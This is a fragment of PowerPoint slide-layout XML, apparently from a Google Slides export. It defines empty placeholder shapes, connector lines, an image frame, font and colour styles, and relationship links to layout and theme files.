              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="758040"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="0072CE"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p9"/>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_PhotoR" type="obj">
  <p:cSld name="OBJECT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="86" name="Shape 86"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="758040"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="1723800"/>
            <a:ext cx="3670800" cy="2470800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89" name="Google Shape;89;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="26184" r="29667" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5407313" y="0"/>
            <a:ext cx="3736689" cy="4750013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="27544"/>
            <a:ext cx="6457200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="1112644"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Google Shape;93;p10"/>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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout23.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout25.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.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1006894" y="840656"/>
            <a:ext cx="6723000" cy="1761300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buFont typeface="Inter Light"/>
              <a:buNone/>
              <a:defRPr i="0" sz="2700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;7;p1"/>
